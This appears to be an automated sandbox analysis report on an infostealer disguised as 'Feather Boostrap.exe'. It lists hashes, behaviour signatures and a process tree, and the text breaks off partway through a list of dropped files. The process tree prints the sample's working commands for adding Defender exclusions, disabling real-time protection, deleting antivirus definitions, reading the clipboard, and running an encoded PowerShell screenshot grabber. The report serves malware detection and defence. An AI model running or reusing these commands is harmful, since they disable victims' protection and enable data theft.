Analysis

  • max time kernel
    92s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2024 23:02

General

  • Target

    Feather Boostrap.exe

  • Size

    7.6MB

  • MD5

    348dbc907eb4d0123302bd6e1adab458

  • SHA1

    0f2ccd3ff897b75f2b62e79d468dbac2acb48ba7

  • SHA256

    b67a2978d34f7b191836f5c18c128d41374fc73767624c7170b9561c1276676a

  • SHA512

    6d15374e0a7d2c56284af70b59f04ec2e4a399f79838bf2cb566c72f61e4022f12a01821262cb1110423d8b051d1fcad5245ba9b20785d26538b8ae2d4105c7f

  • SSDEEP

    196608:OTc1dEjPwfI9jUCnORird1KfbLOYgN2oc+nBIdAxI:V8EIHOQ76bynnBI9

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe
    "C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5068
    • C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe
      "C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3508
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Feather Boostrap.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3456
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('missing : advapi32.dll', 0, 'ERROR 0x3453', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3356
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('missing : advapi32.dll', 0, 'ERROR 0x3453', 32+16);close()"
          4⤵
            PID:4324
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3372
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:400
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3044
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5012
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:2016
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1456
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:1124
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4908
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:208
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3612
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:4700
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1352
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1400
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4964
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3400
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:2916
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:2848
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:640
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:1772
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:2708
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2752
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4396
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:4672
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:1984
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                      3⤵
                        PID:588
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1752
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5g2rw1wc\5g2rw1wc.cmdline"
                            5⤵
                              PID:4064
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC3E.tmp" "c:\Users\Admin\AppData\Local\Temp\5g2rw1wc\CSC6ECE3C951A8F43F5B8FA1A88FEBD2968.TMP"
                                6⤵
                                  PID:1720
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1700
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4812

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            944B

                            MD5

                            cadef9abd087803c630df65264a6c81c

                            SHA1

                            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                            SHA256

                            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                            SHA512

                            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            8a7753640b549244dafbbbc068e9bc5b

                            SHA1

                            973287b37dd2c8ef662db9829ec82205793e8e78

                            SHA256

                            a700ed9ed24158a89ecb35d49e0ea31f83ba123073ed07f35f990242e1a00799

                            SHA512

                            0fed225e1fb142050cd8db3a1c104d0fa72c74d673bdc3b3e9259526159c24478d255098c7bd798d936077727ea8c46e4456c393beba66b831724945a573e54b

                          • C:\Users\Admin\AppData\Local\Temp\5g2rw1wc\5g2rw1wc.dll

                            Filesize

                            4KB

                            MD5

                            31aba3b7fd44d55704aed458609388d9

                            SHA1

                            b5ea8ae2ff2fc2f633f57c8618322a67657b97c2

                            SHA256

                            4a3fbf3d7a92781e6e7e9ab97c80226cddddba86e56b1e3823a260c6905812c9

                            SHA512

                            1af20e9d7bf1b2a25cf89ce46a5dfc3f8b668398da444cc4066b3e64109f636f77155bbe4811068db432d08e40f7dcfcf363276a2163f5ebac8402c6699f9812

                          • C:\Users\Admin\AppData\Local\Temp\RESAC3E.tmp

                            Filesize

                            1KB

                            MD5

                            03adc620edd1f6d734d1c15dd8e8adf5

                            SHA1

                            0a862719c2754bf2474488a03e328677b1ee396b

                            SHA256

                            ecb811a90b28dd850968d2776a66ff1b0ea8c3d0ab5a62b6ca67b846f3c823ce

                            SHA512

                            dafc69b6313e453a2a6ae5cfa493048dff72bd3da6e72e8cc5192e99ecaea48caf7c957da0b387430781b68f9c2212e12a081f2749ed0f5ad9552911e796b8b5

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\VCRUNTIME140.dll

                            Filesize

                            117KB

                            MD5

                            862f820c3251e4ca6fc0ac00e4092239

                            SHA1

                            ef96d84b253041b090c243594f90938e9a487a9a

                            SHA256

                            36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

                            SHA512

                            2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\_bz2.pyd

                            Filesize

                            50KB

                            MD5

                            7727659bb076d34cf0f0ad1c1fc968e6

                            SHA1

                            5d91194bbe6d8caf5eafde938a8d364377b53851

                            SHA256

                            b9a2152a844fb58fb294dc33efd3bd2c266def470bfe4b4edacfb75dd2e3eced

                            SHA512

                            ab4ad49cff143a40c408828e18ea095c2733667ea27e8bbfc4cfa05d433d4c0f8de64b217021b62bcbef538b0d8912a98f53669af3d49acba01e31de6fa4a8c2

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\_ctypes.pyd

                            Filesize

                            61KB

                            MD5

                            9527b566dda0b94f93f6def63baac6bb

                            SHA1

                            fee229ec97ac282c9abde88216ef29096b1b4376

                            SHA256

                            456c82d5b49af25839a62e933794dfec3d2afdef10d23a81fad94b53b488fcc0

                            SHA512

                            d2d1a9d5a4cbdf98b40354366b95e4dfb84a42e6a093e4e402fef5652ceaaf79a0eb80d47bad99ccf202baca365739108110aa2b14a82664b794a3490fe16193

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\_decimal.pyd

                            Filesize

                            109KB

                            MD5

                            0e2118a943a97b74d428204818210403

                            SHA1

                            abfe4cad38a66a6ff448af946cf7250b8b506a2d

                            SHA256

                            ba390b3078a848f0254548fcb5bef8441dbbcb36467f9c6d9d18dacf92a18ded

                            SHA512

                            e21abbaaf27cc19d386ea8b23117420d3a94e4380c900bd7528972fc9fc763f271c3313431b4ef9b5c336e9cdf0631c0780c2bac4b209ea14c9f2e53710c7de7

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\_hashlib.pyd

                            Filesize

                            36KB

                            MD5

                            69da0e0688c8d2b1b6801e63053c3412

                            SHA1

                            85aa9a8a26bf71a923d80690b8c2f9d666a65009

                            SHA256

                            12332eb2c681511bc99bff5a9b14d935933585199f10e57c0f37ebdaa6519ece

                            SHA512

                            5af791409ce722b656775660700048d63dd26055280fe465adc1c53a44071657ef4f036cadb058a65a1e4f57b9dceba431a3bd679c65ca3abe8a80ae004d160f

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\_lzma.pyd

                            Filesize

                            88KB

                            MD5

                            7a4dad239486b02ff5106141d7aba3a7

                            SHA1

                            bd0af849dac3322b64b5d44956074fa50961aaca

                            SHA256

                            10856dbfd8c956e24ed04f6d533b8c03a2131a99f3ae427facd7bee9ad98802a

                            SHA512

                            245b5b86a796660983e3ff0297a930f0d64ea4cecf6e6743d3e4b9999c5990c4ecb1600271fff4e1f0a46ccebc74e6aef522585df50080a86bb104e7797e64ae

                          • C:\Users\Admin\AppData\Local\Temp\_MEI50682\_queue.pyd

                            Filesize

                            27KB

                            MD5

                            051b0b941192073345d52298f0129b1f

                            SHA1

                            348cb2c18e7ecbefc45168259adccaf5287161b2

                            SHA256

                            04ca88870ade6c654490268d93360a61965e8ca799f2d52f6c99948b317bde4d

                            SHA512

